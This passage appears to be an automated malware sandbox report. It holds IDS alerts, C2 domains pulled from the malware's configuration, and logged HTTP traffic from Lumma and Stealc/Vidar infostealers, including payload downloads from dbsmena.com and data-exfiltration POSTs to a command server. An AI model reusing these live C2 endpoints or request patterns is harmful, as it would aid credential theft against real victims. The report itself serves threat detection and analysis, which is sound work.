Source: Network traffic	Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.4:49770 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49777 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49743 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49767 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49767 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49770 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49770 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49766 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49766 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49769 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49769 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49775 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49775 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49773 -> 104.21.58.182:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49773 -> 104.21.58.182:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49772 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49772 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49776 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49776 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49780 -> 104.21.2.13:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.4:49786
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49780 -> 104.21.2.13:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.4:49785

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 104.21.77.130 104.21.77.130
Source: Joe Sandbox View	IP Address: 104.21.4.136 104.21.4.136
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49741 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49746 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49740 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49743 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49745 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49748 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49751 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49750 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49749 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49753 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49754 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49755 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49756 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49760 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49757 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49762 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49758 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49759 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49765 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49763 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49771 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49785 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49774 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49788 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49787 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49784 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49783 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49782 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49786 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49790 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49789 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49764 -> 172.105.54.160:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49768 -> 172.105.54.160:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIIECGHCBFHJKEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJJDHJEGHJKECBGCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 6269Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJJDGHCBGDHIECBGIDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJEGCBGIDGHIDHDGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECGDBFCBKFIDHIDHDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECBAKFBGDGCBGDBAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 130297Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ljhgfsd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: dbsmena.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
Source: global traffic	HTTP traffic detected: GET /vdshfd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: dbsmena.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBFIEBAFCBAAAAKJKJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFHCBFHDHCAAKFHDGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 6197Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFHDHJKKJDHJJJJKEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 5765Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
